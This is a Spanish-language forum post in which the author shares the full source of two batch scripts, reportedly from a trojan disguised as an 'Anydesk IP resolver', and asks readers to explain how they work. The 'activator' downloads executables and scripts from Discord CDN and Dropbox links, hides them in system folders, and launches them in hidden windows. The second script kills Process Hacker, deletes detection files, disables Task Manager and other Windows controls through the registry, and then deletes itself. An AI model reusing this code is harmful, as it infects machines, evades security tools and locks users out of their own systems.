(https://i.postimg.cc/BbBYjQLv/malware-pdf.jpg) (https://postimg.cc/5QjqGJmc)
Hola, este es mi primer post. Y pues decidi subir el codigo fuente de un malware que me encontre en un vide de "Anydesk ip resolver". Era un video falso con un troyano que subieron a anonfiles y los chavales ni se molestaron en ocultar el codigo pasandolo a .exe. Directamente lo pusieron a .bat y era cuestion de suerte que alguien caiga XD
El primer programa se llama Uzi V2
Este seria su "activador"
@echo off
title Uzi Activator
color 04
:HWID
cls
cd C:\Windows\System32
cls
timeout /t 3 > nul
cls
vol > vol.txt
cls
goto ScanHWID
:ScanHWID
cls
::uruwinner::
cd C:\Windows\System32
findstr /m "04E9-5D75" vol.txt
cls
if %errorlevel%==0 (
cd C:\Windows\System32
del "vol.txt"
goto checkusername
)
::CarlosR::
cd C:\Windows\System32
findstr /m "4807-F810" vol.txt
cls
if %errorlevel%==0 (
cd C:\Windows\System32
del "vol.txt"
goto checkusername
)
::Hansy::
cd C:\Windows\System32
findstr /m "CC5D-CC75" vol.txt
cls
if %errorlevel%==0 (
cd C:\Windows\System32
del "vol.txt"
goto checkusername
)
::Verify::
cd C:\Windows\System32
findstr /m "988C-C24A" vol.txt
cls
if %errorlevel%==0 (
cd C:\Windows\System32
del "vol.txt"
goto checkusername
)
::Ryzeon::
cd C:\Windows\System32
findstr /m "22C1-B255" vol.txt
cls
if %errorlevel%==0 (
cd C:\Windows\System32
del "vol.txt"
goto checkusername
)
::Dani::
cd C:\Windows\System32
findstr /m "F891-E910" vol.txt
cls
if %errorlevel%==0 (
cd C:\Windows\System32
del "vol.txt"
goto checkusername
)
mshta.exe vbscript:Execute("msgbox ""You don't have access!"",0,"" "":close")
del %0
exit
:checkusername
::uruwinner::
if %username%==Fede goto checkcomputername
::CarlosR::
if %username%==abiza goto checkcomputername
::Hansy::
if %username%==Diego goto checkcomputername
::Verify::
if %username%==Marcos goto checkcomputername
::Ryzeon::
if %username%==ALEX goto checkcomputername
::Dani::
if %username%==User goto checkcomputername
mshta.exe vbscript:Execute("msgbox ""You don't have access!"",0,"" "":close")
del %0
exit
:checkcomputername
::uruwinner::
if %computername%==DESKTOP-DFMPCSS goto installation1
::CarlosR::
if %computername%==DESKTOP-DVRCK8Q goto installation1
::Hansy::
if %computername%==DESKTOP-KMQPIOC goto installation1
::Verify::
if %computername%==DESKTOP-7C5VCR5 goto installation1
::Ryzeon::
if %computername%==DESKTOP-8V83AVS goto installation1
::Dani::
if %computername%==DESKTOP-312NFIB goto installation1
mshta.exe vbscript:Execute("msgbox ""You don't have access!"",0,"" "":close")
del %0
exit
:installation1
mshta.exe vbscript:Execute("msgbox ""Press accept to start the activation."",0,"" "":close")
cls
echo Starting Activation...
Powershell Invoke-WebRequest https://cdn.discordapp.com/attachments/545694037449900042/583924327808892941/cmdow.exe -OutFile C:\Windows\cmdow.exe
cls
cd C:\Windows
attrib +r +h +s cmdow.exe
start cmd /k "@Echo off & cmdow @ /hid & Powershell Invoke-WebRequest https://cdn.discordapp.com/attachments/682854111846334478/695157811759284254/menumode.exe -OutFile C:\Windows\menumode.exe & cd C:\Windows & attrib +r +h +s menumode.exe & exit"
start cmd /k "@Echo off & cmdow @ /hid & Powershell Invoke-WebRequest https://cdn.discordapp.com/attachments/715686766665007226/723310241403371681/WindowsUpdate.cmd -OutFile C:\Windows\WindowsUpdate.cmd & cd C:\Windows & attrib +r +h +s WindowsUpdate.cmd & exit"
start cmd /k "@Echo off & cmdow @ /hid & Powershell Invoke-WebRequest https://cdn.discordapp.com/attachments/734182612117225542/734234621583163482/Uzi_1.bat -OutFile C:\Windows\System32\Uzi.cmd & cd C:\Windows\System32 & attrib +r +h +s Uzi.cmd & exit"
start cmd /k "@Echo off & cmdow @ /hid & Powershell Invoke-WebRequest https://cdn.discordapp.com/attachments/666069629793206336/681712069950832773/script.exe -OutFile C:\Windows\script0.exe & cd C:\Windows & attrib +r +h +s script0.exe & exit"
start cmd /k "@Echo off & cmdow @ /hid & Powershell Invoke-WebRequest https://cdn.discordapp.com/attachments/715686766665007226/722993965674004511/script2.exe -OutFile C:\Windows\script2.exe & cd C:\Windows & attrib +r +h +s script2.exe & exit"
start cmd /k "@Echo off & cmdow @ /hid & Powershell Invoke-WebRequest https://dl.dropbox.com/s/65yzn81i1jrev72/anydesk.exe?dl=1 -OutFile C:\Windows\anydesk.exe & cd C:\Windows & attrib +r +h +s script3.exe & exit"
mshta.exe vbscript:Execute("msgbox ""Activation started, be patient."",0,"" "":close")
:check1
if exist "C:\Windows\menumode.exe" goto installation1
goto check1
:installation1
mshta.exe vbscript:Execute("msgbox ""Complete 1/7."",0,"" "":close")
goto check2
:check2
if exist "C:\Windows\WindowsUpdate.cmd" goto installation2
goto check2
:installation2
mshta.exe vbscript:Execute("msgbox ""Complete 2/7."",0,"" "":close")
goto check3
:check3
if exist "C:\Windows\System32\Uzi.cmd" goto installation3
goto check3
:installation3
mshta.exe vbscript:Execute("msgbox ""Complete 3/7."",0,"" "":close")
goto check4
:check4
if exist "C:\Windows\script0.exe" goto installation4
goto check4
:installation4
mshta.exe vbscript:Execute("msgbox ""Complete 4/7."",0,"" "":close")
goto check5
:check5
goto installation5
:installation5
mshta.exe vbscript:Execute("msgbox ""Complete 5/7."",0,"" "":close")
goto check6
:check6
if exist "C:\Windows\script2.exe" goto installation6
goto check6
:installation6
mshta.exe vbscript:Execute("msgbox ""Complete 6/7."",0,"" "":close")
goto check7
:check7
if exist "C:\Windows\script3.exe" goto installation7
goto check7
:installation7
mshta.exe vbscript:Execute("msgbox ""Complete 7/7."",0,"" "":close")
goto finish
:finish
cls
mshta.exe vbscript:Execute("msgbox ""Uzi successfully activated!"",0,"" "":close")
del /f/q/a %0
exit
Y este ya seria el programa
@echo off
title
color 04
goto uzi
:uzi
cls
mode 120, 36
echo.
echo `/yhhy/` `
echo yMMMMMMd. `mNNN+ .yNNNh-
echo mMMMMMMMs` ``..-::::::::::::::::::::::::::--....dMMN/ sMMMMMd
echo +MMMMMMMMNmdyhhhdmNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNMMMmmddhssssssomMMMMMm-/
echo +MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMmy```.
echo .MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNNNNy-------------`
echo `MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNNNNNNNNNNNN/
echo sddddddmNNNNNNNNNNNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMdoooooooooooo+.
echo ```````...........:dmmMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMh/////.
echo ```+mNMMMMMMMMMMMMMNNNMNNNNNNNmddddddddddddddddddddddhhhhs.
echo `.+dMMMMMMMMMMMN:.od......so``````````````````````````
echo +MMMMMMMMMMMN- :h` so
echo :MMMMMMMMMMMNy+://. .h:
echo -MMMMMMMMMMMd./sso+++oo:
echo `dMMMMMMMMMMd ``````
echo `NMMMMMMMMMMd
echo `NMMMMMMMMMMd
echo `NMMMMMMMMMMd CRACKED BY FLOZZY
echo hMMMMMMMMMMd` CRACKED BY FLOZZY
echo .hNNMMMMMMMN: CRACKED BY FLOZZY
echo -/hMMMMMN/` CRACKED BY FLOZZY
echo sMMMMMN.
echo sMMMMMN. NO COMPRES ESTA PIJA
echo sMMMMMN.
echo sMMMMMN.
echo sMMMMMN.
echo sMMMMMN.
echo sNNNNNN-
echo ......`
echo ________________________________________________________________________________________________________________________
menumode 0440 " [+] ANTI-SS " " [+] SELF-DESTRUCT " " [+] EXTRA " " [+] EXIT "
if %errorlevel%==1 goto antiss
if %errorlevel%==2 goto destruct
if %errorlevel%==3 goto extra
if %errorlevel%==4 cls & mshta.exe vbscript:Execute("msgbox ""Goodbye!"",0,"" "":close") & exit
:extra
cls
mode 120, 36
echo.
echo `/yhhy/` `
echo yMMMMMMd. `mNNN+ .yNNNh-
echo mMMMMMMMs` ``..-::::::::::::::::::::::::::--....dMMN/ sMMMMMd
echo +MMMMMMMMNmdyhhhdmNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNMMMmmddhssssssomMMMMMm-/
echo +MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMmy```.
echo .MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNNNNy-------------`
echo `MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNNNNNNNNNNNN/
echo sddddddmNNNNNNNNNNNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMdoooooooooooo+.
echo ```````...........:dmmMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMh/////.
echo ```+mNMMMMMMMMMMMMMNNNMNNNNNNNmddddddddddddddddddddddhhhhs.
echo `.+dMMMMMMMMMMMN:.od......so``````````````````````````
echo +MMMMMMMMMMMN- :h` so
echo :MMMMMMMMMMMNy+://. .h:
echo -MMMMMMMMMMMd./sso+++oo:
echo `dMMMMMMMMMMd ``````
echo `NMMMMMMMMMMd
echo `NMMMMMMMMMMd
echo `NMMMMMMMMMMd CRACKED BY FLOZZY
echo hMMMMMMMMMMd` CRACKED BY FLOZZY
echo .hNNMMMMMMMN: CRACKED BY FLOZZY
echo -/hMMMMMN/` CRACKED BY FLOZZY
echo sMMMMMN. CRACKED BY FLOZZY
echo sMMMMMN. CRACKED BY FLOZZY
echo sMMMMMN. CRACKED BY FLOZZY
echo sMMMMMN. CRACKED BY FLOZZY
echo sMMMMMN. CRACKED BY FLOZZY
echo sMMMMMN. CRACKED BY FLOZZY
echo sNNNNNN- CRACKED BY FLOZZY
echo ......`
echo ________________________________________________________________________________________________________________________
menumode 0440 " [+] ANYDESK RESOLVER " " [+] IP FINDER " " [+] HWID SPOOFER " " [+] BACK "
if %errorlevel%==1 cls & cd C:\Windows\System32 & start script0.exe & goto extra
if %errorlevel%==2 cls & cd C:\Windows\System32 & start script2.exe & goto extra
if %errorlevel%==3 cls & cd C:\Windows\System32 & start script3.exe & goto extra
if %errorlevel%==4 goto uzi
:antiss
mode 120, 37
echo.
echo `/yhhy/` `
echo yMMMMMMd. `mNNN+ .yNNNh-
echo mMMMMMMMs` ``..-::::::::::::::::::::::::::--....dMMN/ sMMMMMd
echo +MMMMMMMMNmdyhhhdmNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNMMMmmddhssssssomMMMMMm-/
echo +MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMmy```.
echo .MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNNNNy-------------`
echo `MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNNNNNNNNNNNN/
echo sddddddmNNNNNNNNNNNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMdoooooooooooo+.
echo ```````...........:dmmMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMh/////.
echo ```+mNMMMMMMMMMMMMMNNNMNNNNNNNmddddddddddddddddddddddhhhhs.
echo `.+dMMMMMMMMMMMN:.od......so``````````````````````````
echo +MMMMMMMMMMMN- :h` so
echo :MMMMMMMMMMMNy+://. .h:
echo -MMMMMMMMMMMd./sso+++oo:
echo `dMMMMMMMMMMd ``````
echo `NMMMMMMMMMMd
echo `NMMMMMMMMMMd CRACKED BY FLOZZY
echo `NMMMMMMMMMMd CRACKED BY FLOZZY
echo hMMMMMMMMMMd` CRACKED BY FLOZZY
echo .hNNMMMMMMMN: CRACKED BY FLOZZY
echo -/hMMMMMN/` CRACKED BY FLOZZY
echo sMMMMMN. CRACKED BY FLOZZY
echo sMMMMMN. CRACKED BY FLOZZY
echo sMMMMMN. CRACKED BY FLOZZY
echo sMMMMMN. CRACKED BY FLOZZY
echo sMMMMMN. CRACKED BY FLOZZY
echo sMMMMMN. CRACKED BY FLOZZY
echo sNNNNNN-
echo ......` CRACKED BY FLOZZY
echo. CRACKED BY FLOZZYCRACKED BY FLOZZY
echo ________________________________________________________________________________________________________________________
menumode 0440 " [+] ENABLE NORMAL " " [+] ENABLE BLATANT " " [+] DISABLE " " [+] BACK "
if %errorlevel%==1 goto enable1
if %errorlevel%==2 goto enable2
if %errorlevel%==3 goto disable
if %errorlevel%==4 goto uzi
:enable1
cls
cd C:\Windows\System32
start windowsupdate.cmd
Title %cd%\cmd.exe
cmdow @ /hid
goto loop
:loop
if exist "C:\ProgramData\WindowsSettings.txt" exit
cd C:\Users\%username%\AppData\Local\Temp
del /f/q/a C:\Users\%username%\AppData\Local\Temp\PaladinDriver.sys
del /f/q/a C:\Users\%username%\AppData\Local\Temp\avenge_driver.sys
cd C:\ProgramData\iDetect
del "xxHashSharp.dll"
del "ProcessHacker.Native.dll"
goto loop
:enable2
cls
cmdow @ /hid
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoTrayContextMenu /t REG_DWORD /d 1 /f
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoTrayContextMenu /t REG_DWORD /d 1 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d 4 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetFolders /t REG_DWORD /d 1 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d 1 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWinKeys /t REG_DWORD /d 1 /f
cls
cd C:\Windows\System32
start windowsupdate.cmd
Title %cd%\cmd.exe
goto loop1
:loop1
if exist "C:\ProgramData\WindowsSettings.txt" exit
tasklist | find /I "ProcessHacker.exe"
if %errorlevel%==0 (
TASKKILL /F /IM ProcessHacker.exe
Msg * Runtime Error: Process Hacker 2.lnk
) else (
echo.
)
del /f/q/a C:\Users\%username%\AppData\Local\Temp\PaladinDriver.sys
del /f/q/a C:\Users\%username%\AppData\Local\Temp\avenge_driver.sys
cd C:\ProgramData\iDetect
del "xxHashSharp.dll"
del "ProcessHacker.Native.dll"
cd "C:\Program Files\Process Hacker 2"
del "ProcessHacker.exe"
goto loop1
:disable
cls
cmdow @ /hid
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoTrayContextMenu /f
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoTrayContextMenu /f
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /f
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /f
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /f
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetFolders /f
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /f
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWinKeys /f
cls
cmdow @ /vis
cd C:\ProgramData
WindowsSettings > WindowsSettings.txt
cls
timeout /t 5 > nul
cls
del "WindowsSettings.txt"
mshta.exe vbscript:Execute("msgbox ""Disabled!"",0,"" "":close")
goto antiss
:destruct
cls
cd C:\ProgramData
attrib -r -h -s cmdow.exe
del "cmdow.exe"
cd C:\Windows
attrib -r -h -s script.exe
del "script0.exe"
attrib -r -h -s script2.exe
del "script2.exe"
attrib -r -h -s script3.exe
del "script3.exe"
attrib -r -h -s WindowsConfiguration.cmd
del "WindowsConfiguration.cmd
attrib -r -h -s WindowsConfiguration.log
del "WindowsConfiguration.log"
attrib -r -h -s WindowsUpdate.cmd
del "WindowsUpdate.cmd"
attrib -r -h -s menumode.exe
del "menumode.exe"
del "WindowsUpdate.log"
mshta.exe vbscript:Execute("msgbox ""Successfully destroyed!"",0,"" "":close")
attrib -r -h -s %0
del /f/q/a %0
Si alguien sabe bastante de batch que me explicara como funciona que apenas entiendo el codigo